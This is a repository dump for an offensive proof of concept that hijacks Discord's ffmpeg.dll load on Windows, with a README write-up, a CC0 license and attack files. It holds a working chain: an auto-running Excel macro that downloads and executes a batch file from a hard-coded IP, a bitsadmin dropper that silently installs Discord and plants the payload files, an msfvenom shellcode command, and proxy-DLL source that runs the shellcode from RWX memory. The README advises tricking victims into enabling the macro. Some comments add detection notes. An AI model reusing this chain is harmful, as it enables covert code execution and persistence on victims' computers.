├── LICENSE
├── README.md
├── Update.bat
├── dllmain.cpp
├── ffmpeg.dll
├── macro.txt
└── pop.bin
/LICENSE:
--------------------------------------------------------------------------------
1 | Creative Commons Legal Code
2 |
3 | CC0 1.0 Universal
4 |
5 | CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE
6 | LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN
7 | ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS
8 | INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES
9 | REGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS
10 | PROVIDED HEREUNDER, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM
11 | THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED
12 | HEREUNDER.
13 |
14 | Statement of Purpose
15 |
16 | The laws of most jurisdictions throughout the world automatically confer
17 | exclusive Copyright and Related Rights (defined below) upon the creator
18 | and subsequent owner(s) (each and all, an "owner") of an original work of
19 | authorship and/or a database (each, a "Work").
20 |
21 | Certain owners wish to permanently relinquish those rights to a Work for
22 | the purpose of contributing to a commons of creative, cultural and
23 | scientific works ("Commons") that the public can reliably and without fear
24 | of later claims of infringement build upon, modify, incorporate in other
25 | works, reuse and redistribute as freely as possible in any form whatsoever
26 | and for any purposes, including without limitation commercial purposes.
27 | These owners may contribute to the Commons to promote the ideal of a free
28 | culture and the further production of creative, cultural and scientific
29 | works, or to gain reputation or greater distribution for their Work in
30 | part through the use and efforts of others.
31 |
32 | For these and/or other purposes and motivations, and without any
33 | expectation of additional consideration or compensation, the person
34 | associating CC0 with a Work (the "Affirmer"), to the extent that he or she
35 | is an owner of Copyright and Related Rights in the Work, voluntarily
36 | elects to apply CC0 to the Work and publicly distribute the Work under its
37 | terms, with knowledge of his or her Copyright and Related Rights in the
38 | Work and the meaning and intended legal effect of CC0 on those rights.
39 |
40 | 1. Copyright and Related Rights. A Work made available under CC0 may be
41 | protected by copyright and related or neighboring rights ("Copyright and
42 | Related Rights"). Copyright and Related Rights include, but are not
43 | limited to, the following:
44 |
45 | i. the right to reproduce, adapt, distribute, perform, display,
46 | communicate, and translate a Work;
47 | ii. moral rights retained by the original author(s) and/or performer(s);
48 | iii. publicity and privacy rights pertaining to a person's image or
49 | likeness depicted in a Work;
50 | iv. rights protecting against unfair competition in regards to a Work,
51 | subject to the limitations in paragraph 4(a), below;
52 | v. rights protecting the extraction, dissemination, use and reuse of data
53 | in a Work;
54 | vi. database rights (such as those arising under Directive 96/9/EC of the
55 | European Parliament and of the Council of 11 March 1996 on the legal
56 | protection of databases, and under any national implementation
57 | thereof, including any amended or successor version of such
58 | directive); and
59 | vii. other similar, equivalent or corresponding rights throughout the
60 | world based on applicable law or treaty, and any national
61 | implementations thereof.
62 |
63 | 2. Waiver. To the greatest extent permitted by, but not in contravention
64 | of, applicable law, Affirmer hereby overtly, fully, permanently,
65 | irrevocably and unconditionally waives, abandons, and surrenders all of
66 | Affirmer's Copyright and Related Rights and associated claims and causes
67 | of action, whether now known or unknown (including existing as well as
68 | future claims and causes of action), in the Work (i) in all territories
69 | worldwide, (ii) for the maximum duration provided by applicable law or
70 | treaty (including future time extensions), (iii) in any current or future
71 | medium and for any number of copies, and (iv) for any purpose whatsoever,
72 | including without limitation commercial, advertising or promotional
73 | purposes (the "Waiver"). Affirmer makes the Waiver for the benefit of each
74 | member of the public at large and to the detriment of Affirmer's heirs and
75 | successors, fully intending that such Waiver shall not be subject to
76 | revocation, rescission, cancellation, termination, or any other legal or
77 | equitable action to disrupt the quiet enjoyment of the Work by the public
78 | as contemplated by Affirmer's express Statement of Purpose.
79 |
80 | 3. Public License Fallback. Should any part of the Waiver for any reason
81 | be judged legally invalid or ineffective under applicable law, then the
82 | Waiver shall be preserved to the maximum extent permitted taking into
83 | account Affirmer's express Statement of Purpose. In addition, to the
84 | extent the Waiver is so judged Affirmer hereby grants to each affected
85 | person a royalty-free, non transferable, non sublicensable, non exclusive,
86 | irrevocable and unconditional license to exercise Affirmer's Copyright and
87 | Related Rights in the Work (i) in all territories worldwide, (ii) for the
88 | maximum duration provided by applicable law or treaty (including future
89 | time extensions), (iii) in any current or future medium and for any number
90 | of copies, and (iv) for any purpose whatsoever, including without
91 | limitation commercial, advertising or promotional purposes (the
92 | "License"). The License shall be deemed effective as of the date CC0 was
93 | applied by Affirmer to the Work. Should any part of the License for any
94 | reason be judged legally invalid or ineffective under applicable law, such
95 | partial invalidity or ineffectiveness shall not invalidate the remainder
96 | of the License, and in such case Affirmer hereby affirms that he or she
97 | will not (i) exercise any of his or her remaining Copyright and Related
98 | Rights in the Work or (ii) assert any associated claims and causes of
99 | action with respect to the Work, in either case contrary to Affirmer's
100 | express Statement of Purpose.
101 |
102 | 4. Limitations and Disclaimers.
103 |
104 | a. No trademark or patent rights held by Affirmer are waived, abandoned,
105 | surrendered, licensed or otherwise affected by this document.
106 | b. Affirmer offers the Work as-is and makes no representations or
107 | warranties of any kind concerning the Work, express, implied,
108 | statutory or otherwise, including without limitation warranties of
109 | title, merchantability, fitness for a particular purpose, non
110 | infringement, or the absence of latent or other defects, accuracy, or
111 | the present or absence of errors, whether or not discoverable, all to
112 | the greatest extent permissible under applicable law.
113 | c. Affirmer disclaims responsibility for clearing rights of other persons
114 | that may apply to the Work or any use thereof, including without
115 | limitation any person's Copyright and Related Rights in the Work.
116 | Further, Affirmer disclaims responsibility for obtaining any necessary
117 | consents, permissions or other rights required for any use of the
118 | Work.
119 | d. Affirmer understands and acknowledges that Creative Commons is not a
120 | party to this document and has no duty or obligation with respect to
121 | this CC0 or use of the Work.
122 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Discord DLL hijacking / Automation via Excel Macros.
2 | This is a simple, quick example of DLL hijacking enabling proxy execution for the Discord binary. This can be beneficial for attackers requiring proxy execution to bypass EDR.
3 |
4 | ## Note
5 | I submitted this vuln to Discord via their HackerOne program. They chose not to recognize DLL hijacking unless it is related to the Discord installer binary.
6 | Similarly to chrome: https://chromium.googlesource.com/chromium/src/+/master/docs/security/faq.md#why-arent-physically_local-attacks-in-chromes-threat-model
7 |
8 | I understand this to an extent, but they don't seem to make any attempt to verify these DLLs or load them using the best practices recommended by Microsoft:
9 | https://support.microsoft.com/en-us/topic/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1
10 |
11 | This is an upstream vulnerability introduced through their Node dependencies.
12 |
13 |
14 |
15 |
16 |
17 | ## What is DLL hijacking and why is it useful?
18 |
19 | DLL hijacking has been around a very long time. The severity of these attacks is dependent on a variety of factors, primarily application context.
20 | Microsoft gives a good summary:
21 |
22 | "When an application dynamically loads a dynamic link library (DLL) without specifying a fully qualified path, Windows tries to locate the DLL by searching a well-defined set of directories. If an attacker gains control of one of the directories, they can force the application to load a malicious copy of the DLL instead of the DLL that it was expecting. These attacks are known as “DLL preloading attacks” and are common to all operating systems that support dynamically loading shared DLL libraries. The effect of such attacks could be that an attacker can execute code in the context of the user who is running the application. When the application is being run as Administrator, this could lead to a local elevation of privilege."
23 |
24 | -> Source: https://support.microsoft.com/en-us/topic/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1
25 |
26 | Why should we care?
27 | First off, gaining execution context under a trusted application is useful for proxy execution of malicious payloads. Depending on the AV/EDR, payloads can be executed in a 'trusted' context. Adversaries can also use this technique as a persistence mechanism.
28 |
29 | Discord in some instances requires Administrator privileges when Push-To-Talk is overridden by other administrative applications. This, combined with its popularity, piqued my interest.
30 |
31 |
32 | ## Analyzing with Procmon
33 |
34 | A basic filter turns up a lot of search-based DLL loading misconfigurations. What interested me was the 'ffmpeg.dll' I noticed elsewhere in the Procmon dump. This appears to be a common DLL used by a variety of applications, including WhatsApp.
35 |
36 | 
37 |
38 |
39 |
40 |
41 | ## Generate a payload
42 | Generate some shellcode to your liking. My POC: msfvenom -f raw -o pop.bin -p windows/exec cmd="cmd.exe /k whoami" exitfunc=thread --bad-chars '\x00\x20\' --smallest
43 |
44 | ## Generating a malicious DLL
45 |
46 | Using this great repository we can create our own DLL utilizing pragma comments to replicate functions:
47 | https://github.com/Flangvik/SharpDllProxy
48 |
49 | 
50 |
51 |
52 | This will output two files, .c & an DLL 'tmpXYZ.dll'. Simply create a new DLL project in visual studio and replace the source with the output from DLLProxy.
53 | Once you've compiled it, copy your compiled DLL (name it ffmpegdll), the tmpXYZ.dll (loades your shellcode) and your shellcode.bin into "C:\Users\\AppData\Local\Discord\app-1.0.9012\".
54 |
55 | ## Result
56 | 
57 |
58 | Running Discord.exe executes the shellcode. Great! Interestingly, Discord itself crashes out with no visual artifacts, but our cmd.exe process remains. This is ideal if we drop Discord ourselves as a persistence mechanism without the user's knowledge.
59 |
60 |
61 | ## Weaponizing
62 | It's quite simple to weaponize this DLL hijacking in an automated fashion. Below is a basic macro that downloads and executes a batch file, which installs Discord and downloads the malicious files.
63 |
64 | The kicker for this method:
65 | - Discord installs silently, no on screen artifacts.
66 | - Discord uses its own scheduled task on reboot, giving us code exec.
67 | - Using ffmpeg.dll will give us code execution and crash the legitimate discord process with zero notification to the user. Likely to see WerFault & MiniDumps however.
68 |
69 |
70 |
71 |
72 | ### Excel Macro
73 |
74 | ```
' Auto-executing entry point: Excel runs Workbook_Open as soon as the workbook
' is opened with macros enabled. It fetches Update.txt from a hard-coded IP
' over plain HTTP, writes it to disk as Update.bat under the user's profile,
' and then runs it (see Update.bat for what that stage does).
'
' Defender notes, all grounded in the lines below:
'  - The object chain WinHttp.WinHttpRequest.5.1 -> ADODB.Stream ->
'    WScript.Shell.Run inside an Office process is the classic macro-dropper
'    pattern; Excel spawning a command interpreter to run a .bat is the
'    telemetry hit to hunt for.
'  - The profile path is assembled as C:\Users\<UserName>\AppData\Local by
'    string concatenation rather than read from the environment, so it
'    assumes the default profile location.
'  - Only the file write is guarded by the Status = 200 check; shell.Run is
'    executed unconditionally, so a failed download ends in an unhandled
'    VBA run-time error from Run rather than a silent exit.
Private Sub Workbook_Open()

Dim url, downloadPath, batPath, shell, winHttpReq
url = "http://192.168.120.128/Update.txt"
' Fetched as Update.txt, written to disk as Update.bat.
downloadPath = "C:\Users\" & CreateObject("WScript.Network").UserName & "\AppData\Local\Update.bat"
batPath = "C:\Users\" & CreateObject("WScript.Network").UserName & "\AppData\Local"

' Create a WinHttpRequest object
Set winHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")

' Open a connection to the specified URL (third argument False = synchronous)
winHttpReq.Open "GET", url, False

' Send the HTTP request and download the file
winHttpReq.Send
If winHttpReq.Status = 200 Then
Dim stream
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1 ' Binary
stream.Open
stream.Write winHttpReq.ResponseBody
stream.SaveToFile downloadPath, 2 ' Overwrite
stream.Close
End If

' Execute the downloaded BAT file
' (runs even when the If above did not write anything)
Set shell = CreateObject("WScript.Shell")
shell.Run batPath & "\Update.bat"

Set shell = Nothing
Set winHttpReq = Nothing


End Sub
109 | ```
110 |
111 | ### Seamless Discord install via .bat file.
112 | ```
@echo off
rem Dropper stage launched by the Excel macro (macro.txt). Fetches the pinned
rem Discord installer, runs it silently, waits a fixed 10 seconds, then pulls
rem the three hijack files into the app directory the installer created.
rem
rem Defender notes:
rem  - All transfers go through bitsadmin, a signed Microsoft LOLBin; BITS
rem    jobs named myDownloadJob* that pull from a non-Microsoft host, started
rem    from the macro's shell.Run, are the hunting signal.
rem  - The installer is written to and launched from C:\Windows\Temp with
rem    --silent, so there is no UI for the user to notice.
rem  - Version 1.0.9012 is hard-coded in both the download URL and the
rem    app-1.0.9012 target directory; a differently-versioned Discord would
rem    not receive the files.
rem  - The dropped set is ffmpeg.dll (the forwarding proxy from dllmain.cpp),
rem    tmp108E.dll (the DLL its exports forward to) and pop.bin (the blob
rem    dllmain.cpp reads at runtime).
set DOWNLOAD_URL=https://dl.discordapp.net/distro/app/stable/win/x86/1.0.9012/DiscordSetup.exe
set DOWNLOAD_DLL=http://192.168.120.128/ffmpeg.dll
set DOWNLOAD_BIN=http://192.168.120.128/pop.bin
set DOWNLOAD_tmp=http://192.168.120.128/tmp108E.dll
set DOWNLOAD_LOCATION=C:\Windows\Temp\Update.exe
set EXECUTE_LOCATION=C:\Windows\Temp\

rem COPY_LOCATION is assigned but never referenced below.
set COPY_LOCATION=%LOCALAPPDATA%\Discord\app-1.0.9012\
set DL_DLL=%LOCALAPPDATA%\Discord\app-1.0.9012\ffmpeg.dll
set DL_tmp=%LOCALAPPDATA%\Discord\app-1.0.9012\tmp108E.dll
set DL_bin=%LOCALAPPDATA%\Discord\app-1.0.9012\pop.bin


rem Installer fetched via BITS, then run silently from Temp.
bitsadmin /transfer myDownloadJob /priority normal %DOWNLOAD_URL% %DOWNLOAD_LOCATION%
start "" "%EXECUTE_LOCATION%\Update.exe" --silent
rem Fixed wait, not a check that the install completed.
timeout /t 10
rem Payload files dropped next to the freshly installed Discord.exe.
bitsadmin /transfer myDownloadJob1 /priority normal %DOWNLOAD_DLL% %DL_DLL%
bitsadmin /transfer myDownloadJob2 /priority normal %DOWNLOAD_BIN% %DL_bin%
bitsadmin /transfer myDownloadJob3 /priority normal %DOWNLOAD_tmp% %DL_tmp%
133 | ```
134 |
135 | ### Server setup
136 | Enable Apache 2 and copy across the files shown below (I forgot the .bat file in the screenshot).
137 | 
138 |
139 | Create your macro in a convincing manner, get them to execute it.
140 |
141 | ### Result...
142 | Popped a shell .. :)
143 |
144 | 
145 |
146 |
147 |
148 |
149 |
--------------------------------------------------------------------------------
/Update.bat:
--------------------------------------------------------------------------------
@echo off
rem Dropper stage launched by the Excel macro (macro.txt). Fetches the pinned
rem Discord installer, runs it silently, waits a fixed 10 seconds, then pulls
rem the three hijack files into the app directory the installer created.
rem
rem Defender notes:
rem  - All transfers go through bitsadmin, a signed Microsoft LOLBin; BITS
rem    jobs named myDownloadJob* that pull from a non-Microsoft host, started
rem    from the macro's shell.Run, are the hunting signal.
rem  - The installer is written to and launched from C:\Windows\Temp with
rem    --silent, so there is no UI for the user to notice.
rem  - Version 1.0.9012 is hard-coded in both the download URL and the
rem    app-1.0.9012 target directory; a differently-versioned Discord would
rem    not receive the files.
rem  - The dropped set is ffmpeg.dll (the forwarding proxy from dllmain.cpp),
rem    tmp108E.dll (the DLL its exports forward to) and pop.bin (the blob
rem    dllmain.cpp reads at runtime).
set DOWNLOAD_URL=https://dl.discordapp.net/distro/app/stable/win/x86/1.0.9012/DiscordSetup.exe
set DOWNLOAD_DLL=http://192.168.120.128/ffmpeg.dll
set DOWNLOAD_BIN=http://192.168.120.128/pop.bin
set DOWNLOAD_tmp=http://192.168.120.128/tmp108E.dll
set DOWNLOAD_LOCATION=C:\Windows\Temp\Update.exe
set EXECUTE_LOCATION=C:\Windows\Temp\

rem COPY_LOCATION is assigned but never referenced below.
set COPY_LOCATION=%LOCALAPPDATA%\Discord\app-1.0.9012\
set DL_DLL=%LOCALAPPDATA%\Discord\app-1.0.9012\ffmpeg.dll
set DL_tmp=%LOCALAPPDATA%\Discord\app-1.0.9012\tmp108E.dll
set DL_bin=%LOCALAPPDATA%\Discord\app-1.0.9012\pop.bin


rem Installer fetched via BITS, then run silently from Temp.
bitsadmin /transfer myDownloadJob /priority normal %DOWNLOAD_URL% %DOWNLOAD_LOCATION%
start "" "%EXECUTE_LOCATION%\Update.exe" --silent
rem Fixed wait, not a check that the install completed.
timeout /t 10
rem Payload files dropped next to the freshly installed Discord.exe.
bitsadmin /transfer myDownloadJob1 /priority normal %DOWNLOAD_DLL% %DL_DLL%
bitsadmin /transfer myDownloadJob2 /priority normal %DOWNLOAD_BIN% %DL_bin%
bitsadmin /transfer myDownloadJob3 /priority normal %DOWNLOAD_tmp% %DL_tmp%
21 |
22 |
--------------------------------------------------------------------------------
/dllmain.cpp:
--------------------------------------------------------------------------------
1 |
2 | #include "pch.h"
3 | #include
4 | #include
5 |
#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
// The two lines above silence MSVC's C4996 deprecation warning for fopen();
// the #define sits after the #include lines, so it is the pragma that does
// the work here.

// Export forwarding (DLL proxying). Each of the 54 symbols the host expects
// from ffmpeg.dll is re-exported as a forwarder to the same-named export in
// tmp108E.dll, so the host keeps working while this module's own DllMain
// runs. The README lists tmp108E.dll as the second file that has to be
// copied next to this one; presumably it is the original ffmpeg.dll
// renamed -- verify.
// Static indicator for defenders: an ffmpeg.dll whose export table is
// nothing but forwarders to a tmp*.dll in the same directory, paired with a
// DllMain that creates a thread at process attach (see DllMain below).
#pragma comment(linker, "/export:av_buffer_create=tmp108E.av_buffer_create,@1")
#pragma comment(linker, "/export:av_buffer_get_opaque=tmp108E.av_buffer_get_opaque,@2")
#pragma comment(linker, "/export:av_dict_count=tmp108E.av_dict_count,@3")
#pragma comment(linker, "/export:av_dict_free=tmp108E.av_dict_free,@4")
#pragma comment(linker, "/export:av_dict_get=tmp108E.av_dict_get,@5")
#pragma comment(linker, "/export:av_dict_set=tmp108E.av_dict_set,@6")
#pragma comment(linker, "/export:av_force_cpu_flags=tmp108E.av_force_cpu_flags,@7")
#pragma comment(linker, "/export:av_frame_alloc=tmp108E.av_frame_alloc,@8")
#pragma comment(linker, "/export:av_frame_clone=tmp108E.av_frame_clone,@9")
#pragma comment(linker, "/export:av_frame_free=tmp108E.av_frame_free,@10")
#pragma comment(linker, "/export:av_frame_unref=tmp108E.av_frame_unref,@11")
#pragma comment(linker, "/export:av_free=tmp108E.av_free,@12")
#pragma comment(linker, "/export:av_get_bytes_per_sample=tmp108E.av_get_bytes_per_sample,@13")
#pragma comment(linker, "/export:av_get_cpu_flags=tmp108E.av_get_cpu_flags,@14")
#pragma comment(linker, "/export:av_image_check_size=tmp108E.av_image_check_size,@15")
#pragma comment(linker, "/export:av_init_packet=tmp108E.av_init_packet,@16")
#pragma comment(linker, "/export:av_log_set_level=tmp108E.av_log_set_level,@17")
#pragma comment(linker, "/export:av_malloc=tmp108E.av_malloc,@18")
#pragma comment(linker, "/export:av_max_alloc=tmp108E.av_max_alloc,@19")
#pragma comment(linker, "/export:av_new_packet=tmp108E.av_new_packet,@20")
#pragma comment(linker, "/export:av_packet_alloc=tmp108E.av_packet_alloc,@21")
#pragma comment(linker, "/export:av_packet_copy_props=tmp108E.av_packet_copy_props,@22")
#pragma comment(linker, "/export:av_packet_free=tmp108E.av_packet_free,@23")
#pragma comment(linker, "/export:av_packet_get_side_data=tmp108E.av_packet_get_side_data,@24")
#pragma comment(linker, "/export:av_packet_unref=tmp108E.av_packet_unref,@25")
#pragma comment(linker, "/export:av_rdft_calc=tmp108E.av_rdft_calc,@26")
#pragma comment(linker, "/export:av_rdft_end=tmp108E.av_rdft_end,@27")
#pragma comment(linker, "/export:av_rdft_init=tmp108E.av_rdft_init,@28")
#pragma comment(linker, "/export:av_read_frame=tmp108E.av_read_frame,@29")
#pragma comment(linker, "/export:av_rescale_q=tmp108E.av_rescale_q,@30")
#pragma comment(linker, "/export:av_samples_get_buffer_size=tmp108E.av_samples_get_buffer_size,@31")
#pragma comment(linker, "/export:av_seek_frame=tmp108E.av_seek_frame,@32")
#pragma comment(linker, "/export:av_stream_get_first_dts=tmp108E.av_stream_get_first_dts,@33")
#pragma comment(linker, "/export:av_stream_get_side_data=tmp108E.av_stream_get_side_data,@34")
#pragma comment(linker, "/export:av_strerror=tmp108E.av_strerror,@35")
#pragma comment(linker, "/export:avcodec_align_dimensions=tmp108E.avcodec_align_dimensions,@36")
#pragma comment(linker, "/export:avcodec_alloc_context3=tmp108E.avcodec_alloc_context3,@37")
#pragma comment(linker, "/export:avcodec_descriptor_get=tmp108E.avcodec_descriptor_get,@38")
#pragma comment(linker, "/export:avcodec_descriptor_next=tmp108E.avcodec_descriptor_next,@39")
#pragma comment(linker, "/export:avcodec_find_decoder=tmp108E.avcodec_find_decoder,@40")
#pragma comment(linker, "/export:avcodec_flush_buffers=tmp108E.avcodec_flush_buffers,@41")
#pragma comment(linker, "/export:avcodec_free_context=tmp108E.avcodec_free_context,@42")
#pragma comment(linker, "/export:avcodec_get_name=tmp108E.avcodec_get_name,@43")
#pragma comment(linker, "/export:avcodec_open2=tmp108E.avcodec_open2,@44")
#pragma comment(linker, "/export:avcodec_parameters_to_context=tmp108E.avcodec_parameters_to_context,@45")
#pragma comment(linker, "/export:avcodec_receive_frame=tmp108E.avcodec_receive_frame,@46")
#pragma comment(linker, "/export:avcodec_send_packet=tmp108E.avcodec_send_packet,@47")
#pragma comment(linker, "/export:avformat_alloc_context=tmp108E.avformat_alloc_context,@48")
#pragma comment(linker, "/export:avformat_close_input=tmp108E.avformat_close_input,@49")
#pragma comment(linker, "/export:avformat_find_stream_info=tmp108E.avformat_find_stream_info,@50")
#pragma comment(linker, "/export:avformat_free_context=tmp108E.avformat_free_context,@51")
#pragma comment(linker, "/export:avformat_open_input=tmp108E.avformat_open_input,@52")
#pragma comment(linker, "/export:avio_alloc_context=tmp108E.avio_alloc_context,@53")
#pragma comment(linker, "/export:avio_close=tmp108E.avio_close,@54")
63 |
64 |
// Thread entry started from DllMain: reads the whole of the file "pop.bin"
// into a heap buffer, copies it into a freshly allocated executable region
// and transfers control to it.
//
// lpParameter is unused (DllMain passes NULL).
// Returns 0 only if the copied code returns; per the README the blob is
// built with exitfunc=thread, so a normal return is not expected.
//
// Detection / forensics notes:
//  - "pop.bin" is a relative path, so it is resolved against the host
//    process's current working directory, not the directory this DLL was
//    loaded from.
//  - VirtualAlloc(PAGE_EXECUTE_READWRITE) -> memcpy -> indirect call into
//    the private RWX region is the textbook in-memory loader pattern that
//    memory scanners and RWX-allocation hooks flag.
//  - No return value is checked (fopen, malloc, VirtualAlloc, fread); a
//    missing file or failed allocation faults the host process, which is
//    the kind of crash that leaves WerFault / minidump artifacts.
//  - fp is never closed and buffer is never freed.
DWORD WINAPI DoMagic(LPVOID lpParameter)
{
//https://stackoverflow.com/questions/14002954/c-programming-how-to-read-the-whole-file-contents-into-a-buffer
FILE* fp;
size_t size;
unsigned char* buffer;

// Size is taken from the file itself: seek to end, ftell, seek back.
fp = fopen("pop.bin", "rb");
fseek(fp, 0, SEEK_END);
size = ftell(fp);
fseek(fp, 0, SEEK_SET);
buffer = (unsigned char*)malloc(size);

//https://ired.team/offensive-security/code-injection-process-injection/loading-and-executing-shellcode-from-portable-executable-resources
fread(buffer, size, 1, fp);

// Private, committed, readable-writable-executable region sized to the file.
void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

memcpy(exec, buffer, size);

// Treat the region as a void() and call it on this thread.
((void(*) ())exec)();

return 0;
}
89 |
// Standard DLL entry point. On DLL_PROCESS_ATTACH it starts DoMagic on a new
// thread and immediately drops the handle; the other reason codes do nothing
// and the function always reports success.
//
// hModule and lpReserved are unused.
//
// Notes:
//  - The thread is created while DllMain runs, i.e. under the loader lock;
//    per the documented DllMain rules the new thread does not begin executing
//    DoMagic until this function returns.
//  - CreateThread's result is not checked before CloseHandle.
//  - There is no `break` after CloseHandle, so control falls through into
//    DLL_THREAD_ATTACH, which only breaks -- no behavioural effect, but it
//    reads as unintentional.
//  - Detection: a thread whose start address lies inside a self-built (and
//    so presumably unsigned) ffmpeg.dll under %LOCALAPPDATA%\Discord\app-*\
//    is the runtime signal that pairs with the forwarder-only export table.
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
HANDLE threadHandle;

switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
// https://gist.github.com/securitytube/c956348435cc90b8e1f7
// Create a thread and close the handle as we do not want to use it to wait for it
threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
CloseHandle(threadHandle);
// (falls through to DLL_THREAD_ATTACH; no break here)

case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
114 |
115 |
116 |
117 |
--------------------------------------------------------------------------------
/ffmpeg.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nullsection/Discord-DLL-Hijacking/69619e3a24be18055a0608f38ca43a8894b3d895/ffmpeg.dll
--------------------------------------------------------------------------------
/macro.txt:
--------------------------------------------------------------------------------
' Auto-executing entry point: Excel runs Workbook_Open as soon as the workbook
' is opened with macros enabled. It fetches Update.txt from a hard-coded IP
' over plain HTTP, writes it to disk as Update.bat under the user's profile,
' and then runs it (see Update.bat for what that stage does).
'
' Defender notes, all grounded in the lines below:
'  - The object chain WinHttp.WinHttpRequest.5.1 -> ADODB.Stream ->
'    WScript.Shell.Run inside an Office process is the classic macro-dropper
'    pattern; Excel spawning a command interpreter to run a .bat is the
'    telemetry hit to hunt for.
'  - The profile path is assembled as C:\Users\<UserName>\AppData\Local by
'    string concatenation rather than read from the environment, so it
'    assumes the default profile location.
'  - Only the file write is guarded by the Status = 200 check; shell.Run is
'    executed unconditionally, so a failed download ends in an unhandled
'    VBA run-time error from Run rather than a silent exit.
Private Sub Workbook_Open()

Dim url, downloadPath, batPath, shell, winHttpReq
url = "http://192.168.120.128/Update.txt"
' Fetched as Update.txt, written to disk as Update.bat.
downloadPath = "C:\Users\" & CreateObject("WScript.Network").UserName & "\AppData\Local\Update.bat"
batPath = "C:\Users\" & CreateObject("WScript.Network").UserName & "\AppData\Local"

' Create a WinHttpRequest object
Set winHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")

' Open a connection to the specified URL (third argument False = synchronous)
winHttpReq.Open "GET", url, False

' Send the HTTP request and download the file
winHttpReq.Send
If winHttpReq.Status = 200 Then
Dim stream
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1 ' Binary
stream.Open
stream.Write winHttpReq.ResponseBody
stream.SaveToFile downloadPath, 2 ' Overwrite
stream.Close
End If

' Execute the downloaded BAT file
' (runs even when the If above did not write anything)
Set shell = CreateObject("WScript.Shell")
shell.Run batPath & "\Update.bat"

Set shell = Nothing
Set winHttpReq = Nothing


End Sub
--------------------------------------------------------------------------------
/pop.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nullsection/Discord-DLL-Hijacking/69619e3a24be18055a0608f38ca43a8894b3d895/pop.bin
--------------------------------------------------------------------------------